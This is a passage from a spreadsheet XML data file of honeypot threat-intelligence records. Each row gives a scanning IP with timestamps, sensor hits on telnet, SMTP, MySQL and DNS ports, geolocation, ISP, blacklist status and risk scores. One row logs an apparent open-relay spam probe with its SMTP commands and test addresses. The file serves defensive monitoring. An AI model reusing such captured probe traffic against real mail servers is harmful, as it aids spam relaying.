    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WA"/>
    <s v="Washington"/>
    <s v="King"/>
    <s v="Seattle"/>
    <s v="5809844"/>
    <s v="98111"/>
    <s v="47.6061"/>
    <s v="-122.333"/>
    <s v="40021"/>
    <s v="Nubes, LLC"/>
    <s v="Casablanca INT fraction"/>
    <s v="hosting"/>
    <s v="Casablanca INT"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:55ef:ec09"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2816"/>
    <x v="2816"/>
    <s v="NA&amp;&amp;victoria.basis.com.br"/>
    <x v="0"/>
    <d v="2025-04-07T02:00:54"/>
    <d v="2025-01-19T04:07:39"/>
    <d v="2025-04-07T02:00:54"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="FL"/>
    <s v="Florida"/>
    <s v="Orange"/>
    <s v="Orlando (Central Business District)"/>
    <s v="4167147"/>
    <s v="32826"/>
    <s v="28.5406"/>
    <s v="-81.3786"/>
    <s v="33182"/>
    <s v="HostDime.com, Inc."/>
    <s v="HostDime.com, Inc."/>
    <s v="hosting"/>
    <s v="HostDime.com, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b8ab:f5a4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2817"/>
    <x v="2817"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T00:56:06"/>
    <d v="2024-11-27T14:32:55"/>
    <d v="2025-04-07T00:56:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Fatehgarh Sahib"/>
    <s v="Khamānon Kalān"/>
    <s v="1267105"/>
    <s v="NA"/>
    <s v="30.8172"/>
    <s v="76.3548"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="None"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:9b44"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2818"/>
    <x v="2818"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T00:29:34"/>
    <d v="2024-02-12T06:35:00"/>
    <d v="2025-04-07T00:29:34"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="50777&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:d757"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2819"/>
    <x v="2819"/>
    <s v="NA&amp;&amp;125-229-209-152.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-07T00:23:00"/>
    <d v="2025-01-21T09:33:28"/>
    <d v="2025-04-07T00:23:00"/>
    <n v="181"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="23&amp;&amp;34072&amp;&amp;34057&amp;&amp;38109&amp;&amp;34087&amp;&amp;34112&amp;&amp;34125&amp;&amp;34132&amp;&amp;34099&amp;&amp;34143&amp;&amp;34157&amp;&amp;34166&amp;&amp;34179&amp;&amp;34190&amp;&amp;34200&amp;&amp;34216&amp;&amp;34228&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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de5:d198"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2820"/>
    <x v="2820"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T00:07:40"/>
    <d v="2025-03-20T22:15:27"/>
    <d v="2025-04-07T00:07:40"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H9"/>
    <s v="25"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="142002"/>
    <s v="Scloud Pte Ltd"/>
    <s v="Scloud Pte Ltd"/>
    <s v="hosting"/>
    <s v="Scloud Pte Ltd"/>
    <s v="1993-06-18"/>
    <s v="SCLOUDPTELTD-SG"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 21 Mar 2025 00:45:27 +0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;sp998@ozyegin.edu.tr&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;abbaghali135@yahoo.fr&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;fbidavjackson102100@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 21 Mar 2025 18:36:18 +0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ibepaul01@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 6 Apr 2025 22:09:03 +0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;pwarren@value.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.8.69_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 7 Apr 2025 02:32:36 +0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:ec7e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2821"/>
    <x v="2821"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T23:46:23"/>
    <d v="2025-04-06T14:11:26"/>
    <d v="2025-04-06T23:46:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="North"/>
    <s v="Sāhibābād Daulotpur"/>
    <s v="10263162"/>
    <s v="NA"/>
    <s v="28.747"/>
    <s v="77.1146"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:744b:ff75"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2822"/>
    <x v="2822"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T23:12:13"/>
    <d v="2025-04-06T23:12:13"/>
    <d v="2025-04-06T23:12:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b698:ed32"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2823"/>
    <x v="2823"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T23:01:04"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-06T23:01:04"/>
    <n v="36"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="46"/>
    <s v="Lviv"/>
    <s v="Lvivskyi Raion"/>
    <s v="Lviv"/>
    <s v="702550"/>
    <s v="NA"/>
    <s v="49.8383"/>
    <s v="24.0232"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:80dd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2824"/>
    <x v="2824"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T23:00:58"/>
    <d v="2024-07-09T19:32:00"/>
    <d v="2025-04-06T23:00:58"/>
    <n v="181"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;48445&amp;&amp;9947&amp;&amp;37571&amp;&amp;42168&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:c1a6"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2825"/>
    <x v="2825"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T23:00:55"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-06T23:00:55"/>
    <n v="81"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="53"/>
    <s v="Poltava"/>
    <s v="Kremenchuk Raion"/>
    <s v="Kremenchuk"/>
    <s v="704147"/>
    <s v="NA"/>
    <s v="49.0658"/>
    <s v="33.41"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:14d1"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2826"/>
    <x v="2826"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T23:00:52"/>
    <d v="2025-02-15T12:01:43"/>
    <d v="2025-04-06T23:00:52"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="44"/>
    <s v="Chungcheongnam-do"/>
    <s v="Cheonan-si"/>
    <s v="Cheonan-si (Seobuk-gu)"/>
    <s v="1845757"/>
    <s v="NA"/>
    <s v="36.8927"/>
    <s v="127.162"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b1b:fa75"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2827"/>
    <x v="2827"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T22:35:53"/>
    <d v="2025-04-06T22:35:02"/>
    <d v="2025-04-06T22:35:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CY"/>
    <s v="Cyprus"/>
    <s v="01"/>
    <s v="Nicosia"/>
    <s v="NA"/>
    <s v="Nicosia"/>
    <s v="146268"/>
    <s v="NA"/>
    <s v="35.1856"/>
    <s v="33.3823"/>
    <s v="203020"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="hosting"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="2003-04-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c32f:c2a0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2828"/>
    <x v="2828"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T22:09:51"/>
    <d v="2025-01-11T23:05:44"/>
    <d v="2025-04-06T22:09:51"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Bharti International Singapore PTE LTD"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:18a8"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2829"/>
    <x v="2829"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T22:09:40"/>
    <d v="2025-04-06T22:09:40"/>
    <d v="2025-04-06T22:09:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
